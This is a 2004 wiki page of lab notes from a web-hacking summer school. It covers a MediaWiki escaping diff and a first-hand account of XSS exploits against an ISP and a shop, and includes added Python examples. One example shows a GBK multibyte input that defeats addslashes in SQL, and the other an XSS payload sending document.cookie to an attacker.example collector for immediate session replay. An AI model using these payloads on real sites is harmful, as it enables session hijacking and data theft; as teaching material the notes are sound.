Difference between revisions of "Summerschool Aachen 2004/Hacking the Web Lab"
Revision as of 18:58, 21 September 2004
The mediawiki vulnerability
Sourceforge still has the source code for all previous versions of MediaWiki available, including the 1.3.0 beta versions. I downloaded beta4 and the final 1.3.0 version and did a diff -uNr, resulting in ~20000 lines (~16000 without whitespace-only changes). The most noticeable changes include:
- additional addslashes calls in several places
- addslashes gets substituted by a new function escapePhpString in some places
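An added example, not code from this page or from MediaWiki: a byte-for-byte Python model of PHP's addslashes(), the function the diff above shows being added and replaced, together with a check that shows why it is not a safe escape on its own. addslashes() only prefixes the bytes ', ", \ and NUL with a backslash and knows nothing about the encoding the consumer will use; the constructed input below uses a lead byte from a multibyte charset (GBK) so that the inserted backslash is swallowed into a two-byte character and the quote is left bare. The table and column names are made up, and whether this particular weakness motivated the MediaWiki change is not stated on the page.

```python
# Added example, not from the wiki page or MediaWiki: model PHP addslashes()
# and show a context where it leaves a quote unescaped. All inputs are constructed.

def addslashes(s: bytes) -> bytes:
    """Byte-for-byte model of PHP addslashes(): prefix ' " \\ with a backslash, NUL becomes \\0."""
    out = bytearray()
    for b in s:
        if b in (0x27, 0x22, 0x5C):   # ' " \
            out += b"\\"
            out.append(b)
        elif b == 0x00:
            out += b"\\0"
        else:
            out.append(b)
    return bytes(out)


def build_query(name: bytes) -> bytes:
    """Constructed query: the way addslashes() was typically used, string concatenation into SQL."""
    return b"SELECT * FROM user WHERE user_name='" + addslashes(name) + b"'"


def count_unescaped_quotes(sql: bytes, encoding: str) -> int:
    """Count the single quotes a database decoding `sql` as `encoding` would treat as delimiters.

    A backslash escapes the following character; a quote that is not preceded by a
    backslash counts. A correctly escaped query has exactly two: the open and close.
    """
    text = sql.decode(encoding, errors="replace")
    n, i = 0, 0
    while i < len(text):
        if text[i] == "\\":
            i += 2              # skip the escaped character
            continue
        if text[i] == "'":
            n += 1
        i += 1
    return n


def gbk_bypass_input() -> bytes:
    """Constructed input: 0xBF is a valid GBK lead byte, so 0xBF 0x5C ('\\') becomes one character."""
    return b"\xbf' OR 1=1 -- "


if __name__ == "__main__":
    plain = build_query(b"O'Brien")
    print(plain, count_unescaped_quotes(plain, "latin-1"))
    evil = build_query(gbk_bypass_input())
    # Byte-oriented view: the quote looks escaped. GBK view: the backslash is gone, quote is bare.
    print(count_unescaped_quotes(evil, "latin-1"), count_unescaped_quotes(evil, "gbk"))
```

The point of the last two counts is that the same bytes are safe or unsafe depending only on how the consumer decodes them, which is exactly the information a generic escaper like addslashes() does not have; an escape routine written for one specific context (SQL under a known connection charset, or a PHP string literal) can be correct where a context-free one cannot.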
Real World XSS exploits
Last year, a friend and I found an XSS vulnerability on an ISP's website (NTL), and I wrote an exploit for it. A journalist picked this up and there is a short article on it in The Register. The vulnerability was particularly problematic, since the page in question was for entering credit card details, so JavaScript could be used to forward the details elsewhere. Also, many other services, such as webmail, account management and purchasing services, were run under the same domain name, so it could steal the cookies used for these. There is also a blog posting which gives more details (after it was fixed).
The reason Matthew asked me about this was that I had previously written an exploit for another website (I mention this in another blog post). This was a little more interesting technically, since the session cookies for the site had a fairly short expiry. The normal technique is to use JavaScript to steal the cookie, then send it back to the attacker for later use. Since the session would probably not be valid by the time the attacker got around to getting the cookie, I had to try a different attack. I wrote a Python CGI which would take the session cookie as a form parameter, then used the XSS vulnerability to insert JavaScript to steal the cookie and send it to the CGI. The CGI then immediately took the session cookie and retrieved the contents of the victim's shopping cart, as a proof of concept. Because this happened without any human interaction, the session cookie expiry was not an issue.
If you are interested in finding more vulnerable webpages, then looking for "Widdecombe of the Week" or "Widdy" in the NTK newsletter should find plenty.
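The steal-and-replay-immediately attack described in the second paragraph above, as an added example that is not code from this page or from the original exploit. Everything here is constructed so it runs offline: the target site, its session expiry, the shopping-cart endpoint, the cookie name and the collector URL are all assumptions, and the "browser" is modelled by the query string the injected script would send. The only thing the model is meant to show is the timing argument: the same stolen cookie yields the cart when used at once by the CGI and nothing when an attacker comes back to it later.

```python
# Added example, not from the wiki page: model of "steal the session cookie via XSS
# and have the collector CGI use it immediately". All names and the site are constructed.
from urllib.parse import urlencode, parse_qs

SESSION_TTL = 300  # seconds; assumption: the target's session cookies expire quickly


class TargetSite:
    """Constructed model of the shop: sessions expire, the cart is tied to the session."""

    def __init__(self):
        self.sessions = {}  # session id -> (created_at, cart contents)

    def login(self, now, cart):
        sid = "sess%d" % (len(self.sessions) + 1)
        self.sessions[sid] = (now, cart)
        return "session=" + sid  # what the victim's browser holds in document.cookie

    def view_cart(self, cookie, now):
        sid = cookie.partition("=")[2]
        created, cart = self.sessions.get(sid, (None, None))
        if created is None or now - created > SESSION_TTL:
            return None  # unknown or expired session: the site would show a login page
        return cart


def xss_payload(collector_url):
    """Script injected through the XSS hole: redirect with document.cookie to the attacker's CGI."""
    return ("<script>document.location='%s?c='+"
            "encodeURIComponent(document.cookie)</script>" % collector_url)


def victim_browser(cookie):
    """What the injected script produces: the query string of the redirect to the collector."""
    return urlencode({"c": cookie})


def collector_cgi(query_string, site, now):
    """Model of the Python CGI: read the cookie parameter and use it at once, no human in the loop."""
    cookie = parse_qs(query_string).get("c", [""])[0]
    return site.view_cart(cookie, now)


def delayed_replay(cookie, site, now, delay):
    """The usual 'log the cookie and use it later' approach, which a short TTL defeats."""
    return site.view_cart(cookie, now + delay)


def run_demo(delay=3600):
    """Return (what the immediate CGI got, what a delayed attacker got) for one victim."""
    site = TargetSite()
    cookie = site.login(now=0, cart=["one item"])
    immediate = collector_cgi(victim_browser(cookie), site, now=2)
    later = delayed_replay(cookie, site, now=0, delay=delay)
    return immediate, later


if __name__ == "__main__":
    print(xss_payload("http://attacker.example/collect.cgi"))
    print(run_demo())  # cart contents for the immediate fetch, None for the delayed one
```

In a real deployment the collector would be an actual CGI script making an HTTP request to the shop with a Cookie header built from the stolen value; the model keeps that request in-process so the expiry behaviour can be checked without a network.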
Puzzle Game dievo.org
Nice playground for HTML tricks. Currently I am stuck at level 1.
Spent most of the time installing Java and WebScarab. LiveHeaders, on the contrary, is a more passive approach. I like Paros Proxy, too. You might want to install another Firefox plugin, Switch Proxy.
-- Mario Manno
Firefox extensions
I took a look at some of the web proxies mentioned in the lecture this morning, and decided to investigate developing a Firefox extension to get some of the same functionality (without the pain!). I didn't get very far, but I did find some useful resources, and looked at the source code for a number of existing extensions.
- How to write Firefox extensions: http://extensions.roachfiend.com/howto.php
- XUL tutorial: http://www.xulplanet.com/tutorials/xultu/intro.html
-- Stephen Lewis